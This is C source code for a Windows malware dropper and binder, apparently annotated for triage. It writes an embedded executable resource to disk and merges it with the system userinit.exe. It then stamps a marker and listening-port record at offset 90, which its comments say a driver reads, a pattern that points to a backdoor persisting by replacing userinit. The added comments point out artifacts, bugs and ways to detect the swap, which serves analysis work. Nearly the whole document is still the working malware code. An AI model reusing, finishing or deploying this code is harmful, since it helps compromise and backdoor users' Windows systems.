

#include  
#include  
#include  
#include  
 
// Patch record carried inside the dropped executable (the `who` file).
// CombineWithUserinit() scans that file's bytes for the `finder` value and
// copies this whole record, with file_length filled in, over the first match.
struct	_MODIFY_DATA{ 
	unsigned int finder;       // placeholder marker (0x12345678) the search loop looks for
	unsigned int file_length;  // set at run time to the size of the `who` file
}modify_dAtA = {0x12345678,0}; 
// Marker + port record that CombineWithUserinit() writes at byte offset 90 of
// the output file. The original comments there say it marks the file as
// installed and that a driver reads the port back from this location.
// For triage: the record is written as raw in-memory bytes, so on a
// little-endian build the marker presumably appears as DD CC BB AA - confirm
// against a sample.
struct _SIGNANDPORT{ 
	unsigned int sign;  // fixed marker value 0xAABBCCDD
	unsigned int port;  // defaults to 9929; overwritten with the caller's `port`
}SignAndPort = {0xAABBCCDD,9929}; 
//-------------------------------------------------------------------- 
// Forward declarations for the two routines defined below.
int 
ReleAseTheExe( 
	char* towhere  // this parameter is also used as the first argument of CombineWithUserinit 
	); 
 
int 
CombineWithUserinit( 
	char*	who,///like "C:\\WINDOWS\\System32\\bd_sys.exe"  path of the file that was released (dropped) 
	char*	wheretoreleAse,// location of the generated userinit.exe; the name is not fixed 
	int		port 
	); 
//-------------------------------------------------------------------- 
 
// Writes the resource named "u_userinit" (type "exe") embedded in the running
// module to the file `towhere`, creating it or overwriting an existing file.
// Returns 0 on success and -1 when any step fails.
// For triage: the file left at `towhere` is the dropped artifact to collect
// and hash; the same path is later passed to CombineWithUserinit() as `who`.
int 
ReleAseTheExe( 
	char* towhere  // this parameter is also used as the first argument of CombineWithUserinit 
	) 
{ 
	HRSRC	hRes = NULL; 
	DWORD	dwResSize = 0; 
	HGLOBAL	hResource = NULL; 
	LPVOID	lpfResource = NULL; 
	HANDLE	hFile = NULL; 
	DWORD	dwWritten; 
	DWORD	result; 
 
	// A NULL module handle means the resource is looked up in the executable
	// that started the current process.
	hRes = FindResource(NULL,"u_userinit","exe"); 
	if (hRes == NULL) { 
		return -1; 
	} 
	dwResSize = SizeofResource(NULL,hRes); 
	if (dwResSize == 0) { 
		return -1; 
	} 
	hResource = LoadResource(NULL,hRes); 
	if (hResource == NULL){ 
		return -1; 
	} 
	lpfResource = LockResource(hResource); 
	if (lpfResource == NULL) { 
		return -1; 
	} 
	// CREATE_ALWAYS replaces any existing file at `towhere`; share mode 0
	// keeps other openers out while the handle is held.
	hFile = CreateFile(towhere,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL); 
	// NOTE(review): CreateFile reports failure as INVALID_HANDLE_VALUE, not
	// NULL, so this test does not catch a failed create.
	if (hFile == NULL){ 
		return -1; 
	} 
	result = WriteFile(hFile,lpfResource,dwResSize,&dwWritten,NULL); 
 
	// NOTE(review): this early return leaves hFile open, and dwWritten is
	// never compared with dwResSize, so a short write goes unnoticed.
	if (result == 0){ 
		return -1; 
	} 
	CloseHandle(hFile); 
 
	return 0; 
} 
//-------------------------------------------------------------------- 
// Builds the file `wheretoreleAse` from two inputs:
//   1. the bytes of `who`, with the first 4-byte-aligned occurrence of the
//      0x12345678 placeholder overwritten by modify_dAtA (marker + the size
//      of `who`), followed by
//   2. the bytes of <system directory>\userinit.exe.
// It then overwrites sizeof(struct _SIGNANDPORT) bytes at offset 90 of the
// output with SignAndPort (0xAABBCCDD and `port`).
// Returns 0 when the sequence completes, -1 on the error paths below.
//
// For triage: the output starts with the `who` image, carries the sign/port
// record at offset 90, and has a second executable image appended after
// modify_dAtA.file_length bytes. Putting the output in place of the system
// userinit.exe is not done in this file; presumably a caller does it - confirm.
// Comparing the size, hash and signature of the system userinit.exe with a
// known-good copy would expose such a replacement.
int 
CombineWithUserinit( 
	char*	who,///like "C:\\WINDOWS\\System32\\bd_sys.exe"  path of the file that was released (dropped) 
	char*	wheretoreleAse,// location of the generated userinit.exe; the name is not fixed 
	int		port 
	) 
{ 
	FILE*		in1; 
	FILE*		out; 
	FILE*		in2; 
	int			bytesin; 
	int			totAlbytes = 0; // accumulated byte count; never read in this function 
	char		pAth_userinit[MAX_PATH+1]; 
 
	char*		file1	= who;//"C:\\WINDOWS\\System32\\bd_sys.exe"; 
	char*		file2;	//= "C:\\WINDOWS\\System32\\userinit.exe"; 
	char*		fileOut = wheretoreleAse;//"C:\\userinit.exe"; 
	char*		buff = NULL; 
 
	struct	_stat	ST; 
	unsigned int finder = 0x12345678; 
	unsigned int i,k; 
 
 
	// The global record is updated here and written to the output at the end.
	SignAndPort.port = port; 
 
	// NOTE(review): the return value of GetSystemDirectory is not checked and
	// the strcat is unbounded; a system path close to MAX_PATH would overflow
	// pAth_userinit.
	GetSystemDirectory(pAth_userinit,MAX_PATH); 
	strcat(pAth_userinit,"\\userinit.exe"); 
	file2 = pAth_userinit; 
 
	// NOTE(review): the result of _stat is ignored, so ST is read
	// uninitialized when file1 does not exist.
	_stat(file1,&ST); 
	modify_dAtA.file_length = ST.st_size; 
	if(modify_dAtA.file_length == 0){ 
		printf("error file_length == 0\n"); 
		return -1; 
	} 
	// One buffer sized to file1; it is reused later as the copy buffer for file2.
	buff = malloc(modify_dAtA.file_length); 
	if(buff == NULL){ 
		printf("error mAlloc\n"); 
		return -1; 
	} 
	in1 = fopen(file1,"rb"); 
	if (in1 == NULL){ 
		free(buff); 
		printf("error fopen\n"); 
		return -1; 
	} 
	bytesin = fread(buff,1,modify_dAtA.file_length,in1); 
	fclose(in1); 
 
	if(bytesin != modify_dAtA.file_length ){ 
		free(buff); 
		printf("error cAn not reAd the file1 All\n"); 
		return -1; 
	} 
	//memcpy(buff+modify_dAtA.file_length,&modify_dAtA,sizeof(struct _MODIFY_DATA)); 
	// Scan file1's image in steps of sizeof(finder), so only 4-byte-aligned
	// offsets are compared against the marker bytes.
	// NOTE(review): the bound is unsigned; a file shorter than sizeof(finder)
	// makes the subtraction wrap and the loop read past buff.
	for (i = 0;i < modify_dAtA.file_length - sizeof(finder);i += sizeof(finder)){ 
		for(k = 0;k < sizeof(finder);k++){ 
			if(buff[i+k] != ((char*)&finder)[k]){ 
				break; 
			} 
		} 
		if(k == sizeof(finder)){ 
			// Overwrite the placeholder with {finder, file_length}.
			// NOTE(review): a match less than sizeof(struct _MODIFY_DATA)
			// bytes before the end of buff makes this copy run past the
			// allocation.
			memcpy(buff + i,&modify_dAtA,sizeof(struct _MODIFY_DATA)); 
			break; 
		} 
 
	} 
 
	// The loop ran to its bound without a match: no placeholder in file1.
	if(i >= modify_dAtA.file_length - sizeof(finder)){ 
		free(buff); 
		printf("cAn not find modify_dAtA in %s\n",file1); 
		return -1; 
	} 
	if(_stat(file2,&ST) != 0 || ST.st_size == 0){ 
		free(buff); 
		printf("file2 error\n"); 
		return -1; 
	} 
	out = fopen(fileOut,"wb"); 
	if (out == NULL){ 
		free(buff); 
		printf("creAte %s fAiled\n",fileOut); 
		return -1; 
	} 
	// write file1 into fileOut 
	totAlbytes += fwrite(buff,1,bytesin,out); 
 
	in2 = fopen(file2,"rb"); 
	// NOTE(review): this error path returns without closing `out`.
	if (in2 == NULL){ 
		free(buff); 
		printf("open %s error",file2); 
		return -1; 
	} 
	//totAlbytes += fwrite(&(ST.st_size),sizeof(long),1,out);//sizeof(ST.st_size) 
	printf("ST.st_size: %d\n",ST.st_size); 
	// write file2 into fileOut, in chunks of at most file_length bytes 
	while(bytesin = fread(buff,1,modify_dAtA.file_length,in2)){ 
		totAlbytes += fwrite(buff,1,bytesin,out); 
	} 
	 
	fclose(in2); 
	fclose(out); 
	free(buff); 
 
	// Write the marker and the port number: this indicates the file has already been installed, and the driver reads the port number from here 
	// The marker sits in the DOS stub, at offset 90 from the start of the file 
	// NOTE(review): the file is reopened in "r+" (text mode, no "b") and the
	// fopen result is not checked before fseek/fwrite; in text mode a record
	// byte equal to 0x0A would presumably be newline-translated - confirm.
	out = fopen(fileOut,"r+"); 
	fseek(out,90,SEEK_SET); 
	totAlbytes += fwrite(&SignAndPort,1,sizeof(struct _SIGNANDPORT),out); 
	fclose(out); 
 
	return 0; 
} 
//--------------------------------------------------------------------